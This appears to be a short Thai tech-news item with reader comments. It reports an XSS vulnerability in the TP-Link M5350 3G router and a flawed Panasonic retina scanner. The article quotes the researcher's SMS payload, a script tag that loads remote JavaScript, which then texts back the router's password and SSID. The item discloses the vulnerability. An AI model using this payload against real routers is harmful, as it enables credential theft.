Tags:
Node Thumbnail

Jan Hörsch จากบริษัท Securai รายงานช่องโหว่ของเราท์เตอร์ 3G ของ TP-Link รุ่น M5350 ที่มีช่องโหว่ cross-site scripting (XSS) เปิดทางให้แฮกเกอร์สามารถยิงโค้ดจาวาสคริปต์ขึ้นไปรันได้

นักวิจัยทดสอบด้วยการยิง SMS <script src=//n.ms/a.j></script> เพื่อให้เราท์เตอร์นำโค้ดขึ้นไปรัน จากนั้นตัวสตริปต์จะส่ง SMS กลับมาเป็นรหัสผ่านและ SSID ของตัวเราท์เตอร์

เฟิร์มแวร์ที่พบช่องโหว่ออกมาตั้งแต่มกราคม 2015 รายงานครั้งเดียวกัน Hörsch ยังระบุถึงสินค้าตัวอื่นๆ เช่น Panasonic Retinascanner ที่มีช่องโหว่ในหน้าเว็บ และผู้ผลิตระบุเพียงว่าสินค้าเลิกผลิตและหมดอายุซัพพอร์ตไปแล้ว

ที่มา - The Register, Heise.de

Get latest news from Blognone

Comments

By: whitebigbird
Contributor
on 17 April 2017 - 14:17 #979966
whitebigbird's picture

โค้ดจาวสคริปต์ > จาวา

By: panurat2000
ContributorSymbianUbuntuIn Love
on 18 April 2017 - 15:29 #980153 Reply to:979966
panurat2000's picture

จากนั้นตัวสตริปต์จะส่ง SMS กลับมา

สตริปต์ => สคริปต์